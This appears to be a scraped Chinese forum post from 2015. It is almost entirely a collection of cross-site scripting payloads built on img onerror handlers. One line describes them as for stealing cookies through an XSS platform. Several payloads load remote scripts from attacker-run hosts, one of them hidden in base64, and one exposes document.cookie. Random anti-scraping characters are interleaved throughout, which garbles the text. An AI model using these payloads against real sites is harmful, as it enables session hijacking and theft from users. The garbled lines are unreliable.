<img src='non-exist.jpg'onerror="alert('xss')">
P8 M: F* G8 B8 N6 I<img src=# onerror=alert(123)>2 @' G$ I' {- m& j6 p
<img src=# onerror=alert(document.cookie)>
+ z- V( |$ t2 M( \; a下面是利用平台钓cookie的2 p7 \" v' S" L/ B2 m' r; C# `
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
: v( D, h3 v- b2 x( {3 ~" e; v
y: G( u8 H4 \% C0 F1 I1 l9 q
, s( |0 `/ Q. ]4 k<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>: F% T0 b S1 `0 u& n( K- ~
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
8 S- P9 `. t/ l& C3 u“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img># V& Y K6 f. D- r; {
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
7 H/ U, j/ p; k# C2 [9 w& u<img src="#">
( H1 ]% h7 ?( G2 S. f<img src="#">5 C g& e7 f7 S4 A3 z& j
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>* z% S3 f- w2 U' w, H7 t* j6 `; I
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
& a5 b4 ~1 k5 f: ]' R" [+ p# S<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>$ s6 [7 j' Y. b% P( q E/ M8 w0 ?
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>( H/ N9 P& y3 z2 n
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>/ Q! t' z- z$ P9 h
<img src=x width="0" height="0"></img>2 u; ~5 k: o- K3 |/ Z3 |
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
6 O6 a' |9 g$ X' W4 \<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>5 m# D; {, g( r- Z
|
发表于 2015-10-18 14:33:54
收藏
支持
反对